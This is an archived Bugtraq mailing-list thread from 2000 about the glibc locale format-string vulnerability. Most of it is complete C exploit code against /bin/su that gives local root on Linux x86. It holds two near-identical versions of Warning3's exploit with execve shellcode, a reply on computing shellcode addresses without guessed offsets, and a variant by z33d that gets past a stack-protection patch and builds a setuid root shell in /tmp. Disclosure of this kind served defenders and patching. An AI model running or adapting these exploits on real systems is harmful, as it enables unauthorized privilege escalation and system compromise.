5442114 2000-09-07 05:10 /146 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12636> Ärende: glibc/locale exploit for linux/x86 ------------------------------------------------------------ From: Warning3 <warning3@MAIL.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <200009061306.VAA02539@intra.nsfocus.com> Hi, I write an exploit for testing the glibc/locale format string vulnerability. It is tested in RedHat 6.2 with kernel 2.2.16. regards, warning3 <mailto:warning3@nsfocus.com> /* exploit for glibc/locale format strings bug. * Tested in RedHat 6.2 with kernel 2.2.16. * Script kiddies: you should modify this code * slightly by yourself. :) * * Greets: Solar Designer, Jouko Pynnvnen , zenith parsec * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. * * by warning3@nsfocus.com (http://www.nsfocus.com) * y2k/9/6 */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #define DEFAULT_OFFSET 550 #define DEFAULT_ALIGNMENT 2 #define DEFAULT_RETLOC 0xbfffd2ff #define DEFAULT_BUFFER_SIZE 2048 #define DEFAULT_EGG_SIZE 1024 #define NOP 0x90 #define PATH "/tmp/LC_MESSAGES" char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } main(int argc, char *argv[]) { char *buff, *buff1, *ptr, *egg; char *env[3]; long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr; int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT; int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE; int i,reth,retl,num=113; FILE *fp; if (argc > 1) sscanf(argv[1],"%x",&retloc); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) num = atoi(argv[3]); if (argc > 4) align = atoi(argv[4]); if (argc > 5) bsize = atoi(argv[5]); if (argc > 6) eggsize = atoi(argv[6]); printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]); if (!(buff = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(buff1 = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } printf("Using RET location address: 0x%x\n", retloc); shell_addr = get_esp() + offset; printf("Using Shellcode address: 0x%x\n", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ memset(ptr,'A',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; (*ptr++) = (retloc >> 16 ) & 0xff ; (*ptr++) = (retloc >> 24 ) & 0xff ; } memset(ptr,'A',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { memcpy(ptr, "%.8x", 4); ptr += 4; } sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl)); mkdir(PATH,0755); chdir(PATH); fp = fopen("libc.po", "w+"); fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); fprintf(fp,"msgstr \"%s\\n\"", buff1); fclose(fp); system("/usr/bin/msgfmt libc.po -o libc.mo"); ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); env[0] = egg ; env[1] = "LANGUAGE=sk_SK/../../../../../../tmp"; env[2] = (char *)0 ; execle("/bin/su","su","-u", buff, NULL,env); } /* end of main */ (5442114) ------------------------------------------(Ombruten) Kommentar i text 5444833 av Brevbäraren (som är implementerad i) Python 5444833 2000-09-07 18:51 /42 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12646> Kommentar till text 5442114 av Brevbäraren (som är implementerad i) Python Ärende: Re: glibc/locale exploit for linux/x86 ------------------------------------------------------------ From: Olaf Kirch <okir@CALDERA.DE> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20000907104337.T2636@monad.swb.de> On Wed, Sep 06, 2000 at 09:01:47PM +0800, Warning3 wrote: > printf("Using RET location address: 0x%x\n", retloc); > shell_addr = get_esp() + offset; I've always wondered why all these exploits mess around with strange offsets... When the ix86 Linux kernel execs an ELF program, the stack looks like this (at least it did every time I checked) 0x80000000 0x7FFFFFFC 00 00 00 00 argv[0] + NUL byte last envar ... first envar argv So it's easy to compute the start of your shell code without having to rely on magic offsets: shell_addr = (caddr_t) 0x7FFFFFFC - strlen(ARGV0) - 1 - strlen(EGG) - 1; ... n = 0; myenv[n++] = ... myenv[n++] = EGG; myenv[n++] = NULL; execle(VICTIM_PROGRAM, ARGV0, ..., NULL, myenv); Just wondering... Olaf -- Olaf Kirch | --- o --- Nous sommes du soleil we love when we play okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax okir@caldera.de +-------------------- Why Not?! ----------------------- UNIX, n.: Spanish manufacturer of fire extinguishers. (5444833) ------------------------------------------ 5444806 2000-09-07 18:40 /132 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12643> Kommentar till text 5444805 av Brevbäraren (som är implementerad i) Python Ärende: Bilaga (locale.c) till: Re: glibc/locale exploit for linux/x86 ------------------------------------------------------------ /* exploit for glibc/locale format strings bug. * Tested in RedHat 6.2 with kernel 2.2.16. * Script kiddies: you should modify this code * slightly by yourself. :) * * Greets: Solar Designer, Jouko Pynnvnen , zenith parsec * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. * * by warning3@nsfocus.com (http://www.nsfocus.com) * y2k/9/6 */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #define DEFAULT_OFFSET 550 #define DEFAULT_ALIGNMENT 2 #define DEFAULT_RETLOC 0xbfffd250 #define DEFAULT_BUFFER_SIZE 2048 #define DEFAULT_EGG_SIZE 1024 #define NOP 0x90 #define PATH "/tmp/LC_MESSAGES" char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } main(int argc, char *argv[]) { char *buff, *buff1, *ptr, *egg; char *env[3]; long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr; int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT; int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE; int i,reth,retl,num=111; FILE *fp; if (argc > 1) sscanf(argv[1],"%x",&retloc); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) num = atoi(argv[3]); if (argc > 4) align = atoi(argv[4]); if (argc > 5) bsize = atoi(argv[5]); if (argc > 6) eggsize = atoi(argv[6]); printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]); if (!(buff = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(buff1 = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } printf("Using RET location address: 0x%x\n", retloc); shell_addr = get_esp() + offset; printf("Using Shellcode address: 0x%x\n", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ memset(ptr,'A',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; (*ptr++) = (retloc >> 16 ) & 0xff ; (*ptr++) = (retloc >> 24 ) & 0xff ; } memset(ptr,'A',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { memcpy(ptr, "%.8x", 4); ptr += 4; } sprintf(ptr, "%%x%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl - 6)); mkdir(PATH,0755); chdir(PATH); fp = fopen("libc.po", "w+"); fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); fprintf(fp,"msgstr \"%s\\n\"", buff1); fclose(fp); system("/usr/bin/msgfmt libc.po -o libc.mo"); ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); env[0] = egg ; env[1] = "LANGUAGE=sk_SK/../../../../../../tmp"; env[2] = (char *)0 ; execle("/bin/su","su","-u", buff, NULL,env); } /* end of main */ (5444806) ------------------------------------------(Ombruten) 5446062 2000-09-08 02:53 /174 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12668> Ärende: glibc language ------------------------------------------------------------ From: Maurycy Prodeus <z33d@ETH-SECURITY.NET> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.LNX.3.96.1000907235942.5333A-100000@sv> /* * "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)" * - greg@tenet.pl - * * GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000 * with bypassing Solar Designer Stack Patch * * Dedicated to greg@tenet.pl * * It doesn't work. ;> Try use gdb to find special value. * Tested on Debian 2.1/2.2 ziemniak * Greetz: * - abusers from if.pwr.wroc.pl :))) (IF-NET) * - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :) * - lcamtuf - argante rulz :) * - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc... * :)))))))))))))))))))))) * - secure@poz.sm.pl no i wogole #sigsegv * funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ... * - breslau killers z vx na czele :> * - ppl from my so called real life * - kefir truskawkowy * most code I ripped :> */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #define DEFAULT_ALIGNMENT 2 // #define DEFAULT_RETLOC 0xbfffd2ff // #define DEFAULT_RETLOC 0xbffff798 #define DEFAULT_RETLOC 0xbffff770 #define DEFAULT_BUFFER_SIZE 2048 #define PATH "/tmp/LC_MESSAGES" char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "dupaa" "\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80" "\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; // very special shellcode, 15 min ;> big thanks to yeti char sh[]= "#include <stdlib.h>\n" "#include <stdio.h>\n" "#include <unistd.h>\n" "int main(){\n" "setuid(0);\n" "setgid(0);\n" "system(\"/bin/bash\");\n" "}\n"; int main(int argc, char *argv[]) { char *buff, *buff1, *ptr; char *env[3]; long shell_addr,retloc=DEFAULT_RETLOC; int align=DEFAULT_ALIGNMENT; int bsize=DEFAULT_BUFFER_SIZE; int i,reth,retl,num=132; // maybe 121 struct stat j; FILE *fp; if (argc > 1) sscanf(argv[1],"%x",&retloc); if (argc > 2) num = atoi(argv[2]); printf("Stay sharp ...\n"); printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]); if (!(buff = malloc(1024))) { printf("Can't allocate memory.\n"); exit(0); } if (!(buff1 = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } printf("Using RET location address: 0x%x\n", retloc); shell_addr=0x00124270; // or 0x00124250 printf("Using Shellcode address: 0x%x\n", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ memset(ptr,'A',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; (*ptr++) = (retloc >> 16 ) & 0xff ; (*ptr++) = (retloc >> 24 ) & 0xff ; } memset(ptr,'A',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { memcpy(ptr, "%.8x", 4); ptr += 4; } sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl)); mkdir(PATH,0755); chdir(PATH); fp = fopen("libc.po", "w+"); if (!fp){ printf("Skript kidies ?\n"); exit(0); } fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode); fclose(fp); system("/usr/bin/msgfmt libc.po -o libc.mo"); i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR); fstat(i,&j); lseek(i,j.st_size-2,SEEK_SET); write(i,"\0\0\0\0\0\0",6); close(i); fp = fopen("/tmp/sh.c","w+"); if (!fp){ printf("Skript kidies ?\n"); exit(0); } fprintf(fp,"%s",sh); fclose(fp); system("cd /tmp;gcc sh.c -o sh"); env[0] = "LANGUAGE=sk_SK/../../../../../../tmp"; env[1] = (char *)0 ; execle("/bin/su","su","-u", buff, NULL,env); perror("execle"); return 0; } - z33d - -- Freestate Let yourself go Let yourself go Let your senses overflow Step out of your cage And onto the stage It's time to start Playing your part Freedom awaits Open the gates Open your mind Freedom's a state / Depeche Mode (5446062) ------------------------------------------